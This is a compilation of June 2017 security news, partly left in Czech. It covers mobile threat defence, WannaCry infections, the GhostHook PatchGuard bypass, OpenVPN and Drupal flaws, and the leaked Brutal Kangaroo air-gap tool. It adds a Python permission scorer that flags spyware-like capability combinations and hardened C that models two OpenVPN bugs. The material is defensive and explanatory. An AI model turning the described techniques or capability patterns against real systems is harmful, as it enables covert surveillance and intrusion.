Modern attacks on mobile platforms can be divided into several groups. First, exploitation of vulnerabilities in mobile operating systems; then attacks using malware and rogue applications; and attacks on network communication (so-called Man-in-the-Middle).

Rogue mobile applications can take complete control of our device. They can commandeer the microphone and camera, eavesdrop on and record all our conversations, capture keystrokes, steal access passwords and so on. Recognising a rogue application is not at all easy for the user. Users often pay no attention to what permissions an application actually obtains, or do not understand them sufficiently. Even well-known applications can be modified by an attacker and published on an app marketplace.
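One concrete way to act on the permissions point above is to read what an app declares before it is approved for the corporate profile. The following is an added example written for this page, not any MTD vendor's product; it parses constructed Android manifests and scores them with an assumed weighting, giving extra weight to combinations that pair a sensor or message source with a network path. The permission names are real Android identifiers; the manifests, weights and thresholds are constructed.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Assumed per-permission weights for this example.
PERM_WEIGHTS = {
    "android.permission.RECORD_AUDIO": 3,
    "android.permission.CAMERA": 3,
    "android.permission.READ_SMS": 3,
    "android.permission.RECEIVE_SMS": 3,
    "android.permission.SYSTEM_ALERT_WINDOW": 3,   # overlays, used for credential phishing
    "android.permission.REQUEST_INSTALL_PACKAGES": 3,
    "android.permission.READ_CONTACTS": 2,
    "android.permission.ACCESS_FINE_LOCATION": 2,
    "android.permission.RECEIVE_BOOT_COMPLETED": 1,  # survives reboots
    "android.permission.INTERNET": 1,
}
# Combinations that together give a spyware-like capability (assumed list).
COMBOS = [
    ({"android.permission.RECORD_AUDIO", "android.permission.INTERNET"},
     "audio capture with a network exfiltration path"),
    ({"android.permission.CAMERA", "android.permission.INTERNET"},
     "camera capture with a network exfiltration path"),
    ({"android.permission.READ_SMS", "android.permission.INTERNET"},
     "SMS (one-time code) interception with a network exfiltration path"),
    ({"android.permission.RECEIVE_BOOT_COMPLETED", "android.permission.RECORD_AUDIO"},
     "persistent background audio capture"),
]
COMBO_BONUS = 2
HIGH, MEDIUM = 8, 4

# Constructed manifests (not real apps): a "flashlight" that wants far too much,
# and a notes app that only needs network access.
MANIFEST_FLASHLIGHT = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.flashlight">
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Flashlight"/>
</manifest>
"""
MANIFEST_NOTES = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes"/>
</manifest>
"""


def permissions(manifest_xml):
    """Set of permission names declared with <uses-permission android:name=...>."""
    root = ET.fromstring(manifest_xml)
    names = set()
    for element in root.iter("uses-permission"):
        name = element.get(f"{{{ANDROID_NS}}}name")
        if name:
            names.add(name)
    return names


def assess(manifest_xml):
    """Score a manifest and return the verdict with the reasons behind it."""
    perms = permissions(manifest_xml)
    score = sum(PERM_WEIGHTS.get(p, 0) for p in perms)
    combos = [reason for needed, reason in COMBOS if needed <= perms]
    score += COMBO_BONUS * len(combos)
    verdict = "high" if score >= HIGH else "medium" if score >= MEDIUM else "low"
    return {"score": score, "verdict": verdict, "combos": combos,
            "permissions": sorted(perms)}


if __name__ == "__main__":
    for label, manifest in (("flashlight", MANIFEST_FLASHLIGHT), ("notes", MANIFEST_NOTES)):
        result = assess(manifest)
        print(label, result["verdict"], result["score"], result["combos"])
```

The verdict is a prompt for review, not a malware determination: a genuine flashlight app may need the camera permission on older Android versions, but it has no reason to read SMS or record audio, and the combination list is what makes that stand out.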

Další typy útoků, tzv. MiTM (Man-in-the-Middle), mohou odposlouchávat, přerušovat, nebo měnit komunikaci mezi mobilem a přístupovým bodem. Můžete být přesvědčeni, že komunikujete se známým a důvěryhodným protějškem, i přesto ale útočník může kopírovat vaše hesla, odposlouchávat zprávyi krást citlivé informace. Nejsnadnějším místem pro ně jsou přitom veřejné WiFihotspoty.
A jaké jsou možnosti ochrany?

Obecně vzato lze možnosti řešení bezpečnosti mobilních zařízení rozdělit do tří hlavních skupin:

- Základní vlastnosti platforem – operačních systémů (např. Android nebo iOS)

- řešení typu EMM/MDM
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

- řešení typu MTD

Základní vlastnosti platforem operačních systémů Android nebo iOS přinášejí ve svých nejnovějších verzích řadu nových funkcí pro zlepšení bezpečnosti zejména při jejich využití v podnikovém prostředí. Obě platformy např. nabízejí určitý způsob segmentace dat ve firemním a soukromém profilu a umožňují vytvořit zabezpečený kontejner pro instalaci korporátních aplikací. Vylepšení se dočkalo také zabezpečení dat při přenosu. Důležité však je si uvědomit, že ani jedna platforma vás sama o sobě před moderními mobilními hrozbami neochrání. Obě dvě mají celou řadu zranitelností, jsou náchylné pro spuštění mobilního malwaru a podvodných aplikací a pro síťové útoky přes MiTM.

Besides the most basic security measures at the operating-system level, we also recommend using EMM/MDM systems together with MTD tools for detecting and blocking modern mobile attacks. To secure mobile devices in a corporate environment, you can use central management tools, also known by the abbreviations MDM (Mobile Device Management) or EMM (Enterprise Mobility Management). From a security standpoint, EMM or MDM solutions usually offer a whole range of functions, for example restricting user and application access to hardware (camera, GPS, USB interface and others) and to OS services. They also offer encryption of data in transit and at rest, remote wipe of a lost device, and stronger authentication.
Modern security tools in the MTD category

In response to the rapid development of new types of attacks, a whole range of new security tools has also emerged recently, known today as MTD (Mobile Threat Defense). An MTD solution detects applications downloaded to the device, emulates them in a virtual environment and analyses their behaviour before they are approved or flagged as malicious. This allows you to identify suspicious or malicious applications that your employees use before they cause harm.

Public places are full of open Wi-Fi networks, so it is difficult to tell which networks are safe and which are not. Cybercriminals can use these networks to compromise the communication of smartphones and tablets, take control of the devices and obtain valuable data such as messages, files and credentials. MTD can recognise malicious network behaviour and automatically deactivates suspicious networks to protect your devices and data.

Last but not least, criminals often exploit vulnerabilities in operating systems and applications. An MTD solution continuously analyses the device to uncover vulnerabilities and detects behaviour that cybercriminals could use to attack the device and steal sensitive information.

Modern security tools in the MTD category can thus provide you with all the capabilities needed to secure your mobile data. They analyse suspicious applications, alert you to malicious ones and recommend their removal. They also protect mobile devices from connecting to dangerous Wi-Fi networks and from MiTM ("Man-in-The-Middle") attacks (e.g. SSL Interception - Bump, SSL Stripping, "Superfish" and others), make it possible to block access to the corporate network if a threat is detected on the mobile device, and thanks to emulation technologies can recognise both known and unknown threats. They also uncover attacks on vulnerabilities, configuration changes and advanced rooting and jailbreaking.

Cyber attacks on mobile devices are growing rapidly, along with the growth in their use and criticality. Greater connectivity from practically anywhere combined with insufficient security makes them easy targets for various types of threats. This risk needs to be fully recognised and addressed.


Ransomware Infects Honda Factory

23.6.2017 Novinky/Bezpečnost Viruses
In recent weeks, almost nothing has been heard about the WannaCry ransomware. That does not mean it has stopped spreading across the internet, quite the opposite. This uninvited guest even managed to infect important systems at a Japanese factory of the carmaker Honda, which had to be shut down as a result.
WannaCry struck in the middle of last month. At that time it managed to infect more than 300,000 computers in 150 countries within just a few hours.

Then it seemingly vanished, which probably gave some users a false sense of security. That certainly applies to the security experts in charge of the computer systems at Honda in Japan.

Last week, the carmaker's systems fell victim to the WannaCry ransomware, even though defending against it is relatively simple: installing the update that blocks this uninvited guest from entering Windows is enough.

The factory in the city of Sayama, which otherwise produces around a thousand cars a day, had to be shut down for several days.

As the Cnet website noted, another carmaker has also had unpleasant experiences with WannaCry. The attack had previously hit the Renault-Nissan joint venture, which was forced to halt production for a time, for example in Japan and India.

How a WannaCry attack proceeds
WannaCry, both the first and the improved second generation, attacks in exactly the same way as other extortion viruses, collectively known as ransomware. The malicious code first penetrates the computer, then locks it and encrypts all the data. The cyber pirates then demand a ransom to make the data accessible again.

It must be stressed, however, that even after paying the ransom, users have no guarantee of getting their data back.

WannaCry began spreading across the internet in mid-May. Within just a few hours it managed to infect more than 300,000 computers in more than 150 countries. Almost half of all recorded detections (45.07%) were in Russia. This is because users in poorer areas there still widely use the outdated Windows XP operating system, which was the most vulnerable to the WannaCry malicious code.

Second and third place were taken by Ukraine (11.88%) and Taiwan (11.55%). The other countries in the top ten of the most affected had shares in the low single digits of percent. These included, for example, Egypt, India and the Philippines.

Czech Republic affected only marginally
The Czech Republic finished in the overview with a share of 0.15%, in 52nd place. It should be noted, however, that the lower ranks had very similar shares practically to the end of the list, which contained 150 countries. Neighbouring Slovakia, for example, fared worse: WannaCry had a share of 0.26% there.

Hundreds of machines were infected in the Czech Republic. "According to our data, the number of infections exceeded 620," Pavel Bašta, security analyst at the national security team CSIRT.CZ, said earlier in response to a question from Novinky.


New GhostHook Attack Bypasses Windows 10 PatchGuard Protections
23.6.2017 thehackernews
Attack

Vulnerabilities discovered in Microsoft PatchGuard kernel protection could allow hackers to plant rootkits on computers running the company's latest and secure operating system, Windows 10.
Researchers at CyberArk Labs have developed a new attack technique which could allow hackers to completely bypass PatchGuard and hook malicious kernel code (rootkits) at the kernel level.
PatchGuard, or Kernel Patch Protection, is a software mechanism designed to prevent the kernel of 64-bit versions of Windows from being patched, stopping hackers from running rootkits or executing malicious code at the kernel level.
Dubbed GhostHook, the attack is what the CyberArk Labs researchers call the first technique to defeat this defensive technology and bypass PatchGuard, though it requires a hacker to already be present on a compromised system and running code in the kernel.
So, basically, this is a post-exploitation attack.
"[GhostHook] is neither an elevation nor an exploitation technique. This technique is intended for a post-exploitation scenario where the attacker has control over the asset," CyberArk researchers said.
"Since malicious kernel code (rootkits) often seeks to establish persistence in unfriendly territory, stealth technology plays a fundamental role."
Running Rootkit at Kernel-Level in Windows 10
An attack scenario would include using a hacking exploit or malware first to compromise a target machine and then deploy GhostHook to set up a permanent, secret presence on a compromised 64-bit Windows 10 PC.
Once compromised, an attacker can plant a rootkit in the kernel of the compromised machine, which would be completely undetectable to third-party antivirus and security products and invisible to Microsoft's PatchGuard itself.

CyberArk believes the issue may be extremely difficult for Microsoft to patch, as the technique uses hardware to gain control of critical kernel structures.
GhostHook Exploits a Weakness in Microsoft's Implementation of Intel PT
GhostHook attack bypasses PatchGuard by leveraging a weakness in Microsoft's implementation of a relatively new feature in Intel processors called Intel PT (Processor Trace), specifically at the point where Intel PT talks to the operating system.
Released months after PatchGuard, Intel PT enables security vendors to monitor and trace commands that are executed in the CPU in an attempt to identify exploits, malware or code before they reach the main operating system.
Although this technology exists for legitimate purposes, attackers can also take advantage of the "buffer-is-going-full notification mechanism" in order to take control of a thread's execution.
"How can we achieve that with Intel PT? Allocate an extremely small buffer for the CPU’s PT packets," the researchers said. "This way, the CPU will quickly run out of buffer space and will jump the PMI handler. The PMI handler is a piece of code controlled by us and will perform the 'hook.'"
Hooking techniques, which have both harmless purposes (application security solutions, system utilities, and programming tools) and malicious ones (rootkits), can give hackers control over the way an operating system or a piece of software behaves.
Microsoft in No Mood to Release a Fix, at least Right Now
Microsoft did not consider GhostHook a serious threat and told the security firm that it does not think an emergency patch is needed, but that the issue may be addressed in a future version of Windows.
"The engineering team has finished their analysis of this report and determined that it requires the attacker already be running kernel code on the system," said a Microsoft spokesperson. "As such, this does not meet the bar for servicing in a security update however it may be addressed in a future version of Windows. As such I have closed this case."
In response to this report, Microsoft also released a statement, which reads:
"This technique requires that an attacker has already fully compromised the targeted system. We encourage our customers to practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers."
However, CyberArk is disappointed with the company's response, saying Microsoft should realize that PatchGuard is a kernel component which, in any case, should not be bypassed.


Configuration Error Embarrasses UK's Cyber Essentials

23.6.2017 securityweek  Cyber
The UK government's Cyber Essentials scheme has suffered an embarrassing incident; but one that can hardly be called a breach and certainly not a cyber-attack. A configuration error in the underlying software platform exposed the email addresses of consultancies registered with the scheme -- nothing more.

Cyber Essentials is a UK government-backed certification scheme designed to encourage the adoption of good security practice. It includes five primary technical controls: boundary firewalls and internet gateways; secure configuration (ironically); access control; malware protection; and patch management.

Certification is provided by one of a number of certifying bodies licensed by an accreditation body (currently APMG, CREST, IASME, IRM security and QG).

"Since October 2014 Cyber Essentials has been mandatory for suppliers of Government contracts which involve handling personal information and providing some ICT products and services," explains the Cyber Essentials website. "Holding a Cyber Essentials badge enables you to bid for these contracts."

It seems that the configuration error briefly exposed the email addresses of registered consultancies seeking certification to allow bidding for such government contracts. This error has been fixed by the provider concerned, Pervade Software.

An email notification sent to the 'victims' by Dr Emma Philpott, chief executive at the IASME Consortium (which runs the accreditation of the scheme), stated, "We would like to make you aware that, due to a configuration error in the Pervade Software platform we use for Cyber Essentials assessments, the email address you used to apply for an assessment and your company name may have been released to a third party."

The NCA and Information Commissioner's Office have, as standard practice, been notified; but the scheme doesn't consider it worth a comment on its site. "We would like to make it clear that the security of the assessment platform has not been compromised," continues the statement. "Your account, the answers you provided in the assessment and the report you received are secure. No information other than your email address and your company name was accessible to the third party."

When email addresses are publicly exposed, the primary concern is over an increased likelihood of phishing attacks. This doesn't appear to be a major problem with this incident. "In light of the recent breaches exposing billions of records containing extremely sensitive information, I would not call this particular incident a 'breach'," commented Ilia Kolochenko, CEO of High-Tech Bridge. "Indeed, it can facilitate phishing attacks against the companies whose emails addresses were exposed; however virtually all this data can be gathered from public sources, albeit over a much longer period of time.

“Such incidents are quite hard to avoid unfortunately, moreover, due to lack of resources, many governmental websites have much more dangerous vulnerabilities that remain undetected for years. Practically speaking and due to the nature of the CES accreditation, all the companies from the list should have capabilities to detect and mitigate phishing attacks. Additional vigilance would certainly not harm, though."

It is, in short, a storm in a teacup that is more of an embarrassment to a government security scheme than a danger to the exposed. Nevertheless, it serves to highlight the diligence needed to prevent configuration errors in third-party supplied software -- it could have been much worse.


OpenVPN fixed several remotely exploitable flaws that were not detected by recent audits
23.6.2017 securityaffairs
Vulnerability
OpenVPN has fixed several vulnerabilities that could be exploited by remote attackers; the flaws were not detected in recent audits.
Two separate audits were recently conducted to find security issues in OpenVPN. Many flaws were found, but some vulnerabilities escaped the experts' notice.

Four of the vulnerabilities in OpenVPN 2.4.2 were found by researcher Guido Vranken; they were fixed in the OpenVPN 2.4.3 and OpenVPN 2.3.17 releases.

The CVE-2017-7508 vulnerability is the most severe issue: a remotely triggerable ASSERT() on a malformed IPv6 packet that can be exploited to remotely shut down an OpenVPN server or client. The bug can only be triggered if IPv6 and --mssfix are enabled, and only if the IPv6 networks used inside the VPN are known.

The second flaw found by the expert, tracked as CVE-2017-7521, is caused by code that does not free all allocated memory when using the --x509-alt-username option on OpenSSL builds with an extension (argument prefixed with "ext:").

“Several of our OpenSSL-specific certificate-parsing code paths did not always clear all allocated memory. Since a client can cause a few bytes of memory to be leaked for each connection attempt, a client can cause a server to run out of memory and thereby kill the server. That makes this a (quite inefficient) DoS attack.” states the advisory.

“In particular when using the --x509-alt-username option on openssl builds with an extension (argument prefixed with “ext:”, e.g. “ext:subjectAltName”), the code would not free all allocated memory.”


The third issue, also tracked as CVE-2017-7521, was a potential double-free in --x509-alt-username. The vulnerability is exploitable on configurations that use the --x509-alt-username option with an x509 extension.

“OpenVPN did not check the return value of ASN1_STRING_to_UTF8() in extract_x509_extension(). Ignoring such a failure could result in buf being free’d twice. An error in ASN1_STRING_to_UTF8() can be caused remotely if the peer can make the local process run out of memory.” reads the advisory.

“The problem can only be triggered for configurations that use the --x509-alt-username option with an x509 extension (i.e. the option parameter starts with “ext:”).”

A fourth vulnerability, tracked as CVE-2017-7522, was a post-authentication remote DoS when using the --x509-track option.

“asn1_buf_to_c_string() returned a literal string if the input ASN.1 string contained a NUL character, while the caller expects a mutable string. The caller will attempt to change this string, which allows a client to crash a server by sending a certificate with an embedded NUL character.” continues the advisory. “The other way around is not interesting, as servers are allowed to stop a client by design.”

OpenVPN also fixed other bugs, such as a pre-authentication remote crash/information disclosure for clients, tracked as CVE-2017-7520.


Drupal fixes the CVE-2017-6922 flaw exploited in spam campaigns in the wild
23.6.2017 securityaffairs 
Vulnerability

Drupal team released security updates to fix several vulnerabilities, including the critical access bypass flaw CVE-2017-6922 exploited in spam campaigns.
The Drupal development team has released security updates to fix several vulnerabilities, including the critical access bypass flaw tracked as CVE-2017-6922 that has been exploited in spam campaigns.

The CVE-2017-6922 flaw was fixed with the release of Drupal versions 7.56 and 8.3.4.

The Drupal Security Team observed a trend of attacks exploiting a site misconfiguration that affects all websites which allow file uploads by untrusted or anonymous visitors and store the uploaded files in the public file system.

Files uploaded by such users are publicly accessible, allowing anyone on the internet to retrieve them. An attacker could therefore use the site to host content that the legitimate site maintainers would not want made publicly available through their site.

“The majority of the reports are based around the webform module, however, other modules are vulnerable to this misconfiguration as well.” states the security advisory.

“For example, if a webform configured to allow anonymous visitors to upload an image into the public file system, that image would then be accessible by anyone on the internet. The site could be used by an attacker to host images and other files that the legitimate site maintainers would not want made publicly available through their site.”

Drupal has been aware of attacks in the wild exploiting this misconfiguration since October 2016; the new releases will not by themselves prevent this kind of abuse.


Drupal 8.3.4 also fixes a critical flaw, tracked as CVE-2017-6920, related to how the PECL YAML parser handles unsafe objects; the flaw could be exploited by an attacker for remote code execution.

Also fixed in Drupal 8 is an improper field validation vulnerability, tracked as CVE-2017-6921.

“A site is only affected by this if the site has the RESTful Web Services (rest) module enabled, the file REST resource is enabled and allows PATCH requests, and an attacker can get or register a user account on the site with permissions to upload files and to modify the file resource,” reads the advisory.

In April 2017, security experts discovered a critical vulnerability affecting the Drupal References module, which is used by hundreds of thousands of websites running the popular CMS.

The Drupal team published a security advisory on April 12 informing users of the critical flaw.

The flaw has a huge impact on the Drupal community because the affected module is currently used by more than 121,000 websites.

“The module is currently used by over 120 000 individual Drupal installations, but is no longer maintained. The last update was done in February 2013. Unfortunately, a critical security vulnerability in this references module has been reported by the Drupal core security team as SA-CONTRIB-2017-38:

The module was no longer supported; fortunately, a new maintainer addressed the flaw.


OpenVPN Patches Remotely Exploitable Vulnerabilities

22.6.2017 securityweek Vulnerability
OpenVPN this week patched several vulnerabilities impacting various branches, including flaws that could be exploited remotely.

Four of the bugs were found by researcher Guido Vranken through fuzzing, after recent audits found a single severe bug in OpenVPN. While analyzing OpenVPN 2.4.2, the researcher found and reported four security issues that were addressed in the OpenVPN 2.4.3 and OpenVPN 2.3.17 releases this week.

The most important of the four issues is a remotely triggerable ASSERT() on a malformed IPv6 packet that can be exploited to remotely shut down an OpenVPN server or client. Tracked as CVE-2017-7508, the bug can be triggered only if IPv6 and --mssfix are enabled, and only if the IPv6 networks used inside the VPN are known.

Tracked as CVE-2017-7521, a second vulnerability involves remote-triggerable memory leaks. The issue is that the code doesn’t free all allocated memory when using the --x509-alt-username option on OpenSSL builds with an extension (argument prefixed with "ext:").

“Several of our OpenSSL-specific certificate-parsing code paths did not always clear all allocated memory. Since a client can cause a few bytes of memory to be leaked for each connection attempt, a client can cause a server to run out of memory and thereby kill the server. That makes this a (quite inefficient) DoS attack,” OpenVPN explains in an advisory.

The third vulnerability Guido Vranken discovered was a potential double-free in --x509-alt-username, also tracked as CVE-2017-7521. The bug can be triggered only on configurations that use the --x509-alt-username option with an x509 extension, and the function involved is very unlikely to fail in real-world usage for reasons other than memory exhaustion, the researcher found.

The fourth issue found by Vranken was a post-authentication remote DoS when using the --x509-track option. Tracked as CVE-2017-7522, the vulnerability resides in asn1_buf_to_c_string() returning a literal string rather than a mutable one when the input ASN.1 string contains a NUL character. When the caller attempts to modify this string, the process crashes, which allows a client to crash a server by sending a certificate with an embedded NUL character.

Another security bug resolved in OpenVPN this week was a pre-authentication remote crash/information disclosure for clients. Tracked as CVE-2017-7520, the issue could allow a man-in-the-middle attacker between the client and the proxy to crash or disclose at most 96 bytes of stack memory (likely containing the proxy password).

The vulnerability can be triggered only on clients that use an HTTP proxy with NTLM authentication and is unlikely to compromise the security of the OpenVPN tunnel itself if the password isn't reused. Clients that don't use the --http-proxy option with ntlm2 authentication are not affected.

OpenVPN also resolved a null-pointer dereference in establish_http_proxy_passthru(), where the client could crash “if the peer did not specify the 'realm' and/or 'nonce' values. These pointers are dereferenced in DigestCalcHA1() and DigestCalcResponse(); hence, if not set, a null-pointer dereference would occur.”
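The two certificate string-handling defects described in this article and in the securityaffairs write-up earlier on this page (the unchecked ASN1_STRING_to_UTF8() return behind the CVE-2017-7521 double-free, and the literal-instead-of-mutable return behind CVE-2017-7522), modelled in C as an added example that is not OpenVPN's code. to_utf8, asn1_buf_to_c_string_safe, convert_extensions and the simulate_oom switch are constructed stand-ins, and no OpenSSL is needed to build it.

```c
/*
 * Added example, not OpenVPN's code.  It models two defects from the
 * advisories quoted above using constructed stand-ins:
 *
 *  - CVE-2017-7522: a converter that returned a string *literal* on its
 *    embedded-NUL error path, while callers assumed heap memory they could
 *    modify in place and free().
 *  - CVE-2017-7521 (double-free): a caller that ignored the return value of
 *    ASN1_STRING_to_UTF8() and so freed a stale pointer a second time.
 *
 * The names to_utf8, asn1_buf_to_c_string_safe and convert_extensions and the
 * simulate_oom switch are assumptions made for this example.
 */
#include <stdlib.h>
#include <string.h>

/* Test hook: when non-zero the converter fails as if allocation had failed,
 * which is how the advisory says the real failure can be triggered remotely. */
int simulate_oom = 0;

/* Stand-in for ASN1_STRING_to_UTF8(): on success stores a fresh heap copy in
 * *out and returns its length; on failure returns -1 and leaves *out untouched.
 * That untouched pointer is exactly what the vulnerable caller freed twice. */
int to_utf8(unsigned char **out, const unsigned char *in, size_t len)
{
    if (simulate_oom)
        return -1;
    unsigned char *copy = malloc(len + 1);
    if (copy == NULL)
        return -1;
    memcpy(copy, in, len);
    copy[len] = '\0';
    *out = copy;
    return (int)len;
}

/* Hardened replacement for the shape `return "ERROR: ...";` on the NUL path.
 * Every path returns either NULL or heap memory the caller owns, so in-place
 * edits and free() by the caller are always safe. */
char *asn1_buf_to_c_string_safe(const unsigned char *buf, size_t len)
{
    const char *err = "ERROR: string contains null char";
    if (buf == NULL)
        return NULL;
    if (memchr(buf, '\0', len) != NULL) {
        /* Embedded NUL: hand back a mutable copy of the marker, not a literal. */
        char *m = malloc(strlen(err) + 1);
        if (m != NULL)
            strcpy(m, err);
        return m;
    }
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    memcpy(s, buf, len);
    s[len] = '\0';
    return s;
}

/* Hardened caller for a list of certificate extension values: the return value
 * is checked and the pointer is reset after every free(), so a failed
 * conversion can never lead to a double free.  Returns how many values were
 * converted successfully. */
int convert_extensions(const unsigned char *const *exts, const size_t *lens, size_t n)
{
    unsigned char *buf = NULL;
    int ok = 0;
    for (size_t i = 0; i < n; i++) {
        if (to_utf8(&buf, exts[i], lens[i]) < 0)
            continue;          /* buf was not reassigned: nothing to free here */
        /* ... real code would compare buf against the expected username ... */
        free(buf);
        buf = NULL;            /* the reset the unchecked-return bug lacked */
        ok++;
    }
    return ok;
}

/* Returns 1 when the converter's result can be edited in place and freed,
 * i.e. the contract callers of the original function relied on. */
int result_is_mutable(const unsigned char *buf, size_t len)
{
    char *s = asn1_buf_to_c_string_safe(buf, len);
    if (s == NULL)
        return 0;
    s[0] = 'x';                /* would fault on a read-only literal */
    free(s);
    return 1;
}
```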


Microsoft Extends Edge Bounty Program Indefinitely

22.6.2017 securityweek Safety
Microsoft this week announced that the Edge Web Platform bounty program launched for Windows Insider Preview (WIP) last year has been extended indefinitely.

The program was launched on August 4, 2016, and Microsoft says that it has already paid over $200,000 in bounties over the ten-month period.

Because the program helped it make significant improvements to Edge’s security, the technology giant decided to extend the program indefinitely.

“Keeping in line with our philosophy of protecting customers and proactively partnering with researchers, today we are changing the Edge on Windows Insider Preview (WIP) bounty program from a time bound to a sustained bounty program,” Akila Srinivasan, Microsoft Security Response Center, announced.

The Edge Web Platform bounty on WIP was launched to encourage researchers to report remote code execution (RCE), same-origin policy bypass vulnerabilities (such as UXSS), and referrer spoofing bugs in the browser.

Moving forward, the company will continue to accept critical remote code execution and important design issues that could result in a customer's privacy and security being compromised.

The program will continue indefinitely at Microsoft's discretion, and reporting researchers can earn bounty payouts ranging from $500 to $15,000, depending on the severity of the reported vulnerability.

According to Microsoft, researchers who report qualifying vulnerabilities already found internally by Microsoft are eligible for a maximum bounty of $1,500 (only the first reporter receives the payout).

To qualify for the bounty program, vulnerabilities must be reproducible on the latest Windows Insider Preview (slow track), Srinivasan says.

Interested researchers are required to report Microsoft Edge browser security bugs to secure@microsoft.com under the company's Coordinated Vulnerability Disclosure (CVD) policy.

For information on the Microsoft Bounty Programs, researchers should refer to this page on the company’s Security TechCenter website, and to the associated terms and FAQs.


No, WannaCry Is Not Dead! Hits Honda & Traffic Light Camera System
22.6.2017 thehackernews 
Ransomware
It's been over a month since the WannaCry ransomware caused chaos worldwide, and people have started to think of it as a thing of the past, but…
...WannaCry is not DEAD!
The self-spreading ransomware is still alive and is working absolutely fine.
The latest victims of WannaCry are Honda Motor Company and 55 speed and traffic light cameras in Australia.
The WannaCry ransomware shut down hospitals, telecom providers, and many businesses worldwide, infecting over 300,000 Windows systems running SMBv1 in more than 150 countries within just 72 hours starting on 12th of May.
The worm leveraged an NSA Windows SMB exploit, dubbed EternalBlue, leaked by the infamous hacking group Shadow Brokers in its April data dump along with other Windows exploits.
Honda Stops Production After WannaCry Hits its Computer
Honda Motor Company released a statement this week, saying the company was forced to halt production for more than 24 hours at one of its Japan-based factories after finding WannaCry infections in its computer networks.
The automaker halted production of more than 1,000 vehicles at its Sayama plant, northwest of Tokyo, on Monday 19th June after it discovered that the ransomware had affected networks across Japan, North America, Europe, China, and other regions despite its efforts to secure systems in mid-May, according to a Wednesday report from Reuters.
While Honda did not say how WannaCry got into its networks 37 days after a researcher activated the kill switch, it's clear that the computers inside the Honda network were either running unsupported versions of Windows or had not installed the highly critical patch released by Microsoft in March.
Honda's Sayama plant, which produces the Accord sedan, Odyssey minivan, Step Wagon compact multipurpose vehicle and more, produces around 1,000 vehicles per day.
Renault and Nissan were also infected by the WannaCry ransomware last month, which forced them to temporarily halt production at plants in Britain, India, Japan, France, and Romania.
WannaCry Hits 55 Traffic-Light and Speed Cameras in Australia
Another recent WannaCry victim was spotted in Australia when the Victoria Police confirmed that the ransomware infected a total of 55 red light cameras and speed cameras in Victoria via private camera operator Redflex.
The malware locked down critical files and demanded a ransom in return (WannaCry usually demands $300 to unlock files), according to the 3AW morning radio show.
"A system patch has been applied, which prevents the spread of the virus," the officials told the show. "The Department is in the process of removing the [WannaCry] virus from the affected cameras. The remaining websites will be rectified in the next couple of days."
The authorities believed the infection was the result of a targeted cyber attack, rather than 'human error,' likely on the part of a camera technician, and that WannaCry got onboard via a USB drive.
"Our advice at this stage is that a software virus has been detected however the camera system has not been compromised," the police said. "We will look into all incidents detected by the speed and red light cameras during the time in question as a matter of course. The integrity of the camera system has not been affected."
Well, it is quite surprising that even after knowing about the WannaCry issue for quite a decent amount of time, big companies have not yet implemented proper security measures to defend against the threat.
Ransomware has become an albatross around everyone's neck. Recently, a South Korean web hosting provider confirmed that the company had paid a record $1 Million ransom to hackers in return for its data following a ransomware attack over the weekend.
In cyberspace, Ignorance is not bliss. So, go and apply the goddamn patches and disable the unsecured, 30-year-old SMBv1 file-sharing protocol on your systems.


Brutal Kangaroo: CIA-developed Malware for Hacking Air-Gapped Networks Covertly
22.6.2017 thehackernews BigBrothers

WikiLeaks has published a new batch of the ongoing Vault 7 leak, this time detailing a tool suite for Microsoft Windows, allegedly used by the CIA, that targets "closed networks by air gap jumping using thumb drives," networks mainly found in enterprises and critical infrastructure.
Air-gapped computers, which are isolated from the Internet or other external networks and are believed to be the most secure computers on the planet, have become a regular target in recent years.
Dubbed Brutal Kangaroo (v1.2.1), the tool suite was allegedly designed by the Central Intelligence Agency (CIA) in 2012 to infiltrate a closed network or air-gapped computer within an organization or enterprise without requiring any direct access.
The previous version of Brutal Kangaroo was named EZCheese and exploited a vulnerability that was a zero-day until March 2015, while the newer version uses an "unknown link file vulnerability (Lachesis/RiverJack) related to the library-ms functionality of the operating system."
Here's How the Air-Gap Attack Works

Like most air-gap malware techniques we have reported on at The Hacker News, this hacking tool first infects an Internet-connected computer within the target organization and then installs the Brutal Kangaroo malware on it.

Even if it's hard to reach an Internet-connected PC within the target organisation, the attackers can infect a computer belonging to one of the organisation's employees and then wait for the employee to insert a USB drive into it.
Now, as soon as a user (the employee of the organisation) inserts a USB stick into the infected computer, Shattered Assurance, a server tool, infects the USB drive with a separate piece of malware called Drifting Deadline (also known as 'Emotional Simian' in the latest version).

The USB drive then infects other machines with the help of a flaw in the Microsoft Windows operating system that can be exploited by hand-crafted link files (.lnk) to load and execute programs (DLLs) without user interaction.
"The .lnk file(s) must be viewed in windows explorer, and the tool will be auto-executed without any further input." the manual says.
When the infected USB drive is used to share data with air-gapped computers, the malware spreads itself to those systems as well.
"If multiple computers on the closed network are under CIA control, they form a covert network to coordinate tasks and data exchange. Although not explicitly stated in the documents, this method of compromising closed networks is very similar to how Stuxnet worked," WikiLeaks said.
"Brutal Kangaroo components create a custom covert network within the target closed network and provide functionality for executing surveys, directory listings, and arbitrary executables," a leaked CIA manual reads.

The malware then covertly starts collecting data from the infected air-gapped computers (using Shadow, the primary persistence mechanism), and a module within the Brutal Kangaroo suite, dubbed "Broken Promise," analyses the data for useful information.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks dumped an alleged CIA framework used for monitoring the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
Dubbed "Cherry Blossom," the framework was basically a remotely controllable firmware-based implant for wireless networking devices, including routers and wireless access points (APs), which exploits router vulnerabilities to gain unauthorized access and then replace the firmware with custom Cherry Blossom firmware.
Since March, the whistleblowing group has published 12 batches in the "Vault 7" series, which include this week's and last week's leaks along with the following:
